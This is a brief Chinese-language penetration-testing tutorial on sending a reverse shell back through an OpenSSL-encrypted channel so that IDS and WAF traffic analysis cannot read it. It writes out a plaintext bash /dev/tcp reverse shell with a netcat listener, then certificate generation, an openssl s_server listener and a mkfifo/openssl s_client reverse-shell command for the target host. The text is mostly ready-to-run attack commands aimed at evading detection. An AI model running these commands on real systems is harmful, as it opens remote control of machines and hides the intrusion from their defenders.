使用Openssl反弹加密shell
进行渗透测试得后渗透阶段为了进行横向渗透,往往需要反弹shell,如果反弹shell,如果反弹shell都是明文传输,如果内网有IDS或者防护软件会进行流量分析,很快被发现,如果攻击流量回溯分析。就可以复现攻击得过程,此时整个攻击就会被暴漏出来。
使用wireshark抓包直接看到输入得命令返回信息,这些命令会被WAF或者IPS所检测所以需要对这些信息进行加密。
wireshark抓取未加密得shell分析
bash -i >& /dev/tcp/192.168.31.96/8080 0>&1
nc -lvnp 8080
wireshark抓包获取
Openssl加密shell
在计算机网络上,OpenSSL是一个开放源代码得软件库包,应用程序可以使用这个包来进行安全通信,避免窃听。同时确认另一端连接者的身份,这个包广泛用于互联网的网页服务器上。
kali上使用Openssl生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
在kali上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
在目标上执行反弹shell命令
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.31.96:8080 > /tmp/s; rm /tmp/s
wireshark 查看Openssl加密过后的流量。